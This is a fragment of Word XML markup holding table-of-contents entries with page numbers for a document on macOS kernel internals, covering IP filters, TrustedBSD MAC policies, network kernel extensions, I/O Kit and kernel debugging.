            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313283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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.14.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ip_filter</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313284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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.14.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enum ip filters</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313285 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>123</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286" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.15.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TrustedBSD</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313286 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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7" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.15.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>_mac_policy_list</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313287 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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8" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.15.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mac_policy_element</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313288 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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289" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.15.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enum mac policy</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313289 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>124</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90" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Storage System</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313290 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.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291 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.</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292 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</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93" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NKE (Network Kernel Extension)</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313293 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.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294 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>127</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295" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>I/O Kit</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313295 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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6" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.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296 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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7" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>External Methods interface</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313297 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12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8" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Device Reconginzation</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313298 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>134</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299" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Connection</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313299 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13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0" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>File System Access</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313300 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.6.</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1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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.7.</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2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3" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.8.</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3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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.9.</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4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05" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.10.</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5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06" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1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6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07" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.12.</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07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308" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kernel Debug</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313308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09" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kernel Background</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313309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0" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Debug args Background</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313310 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>138</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
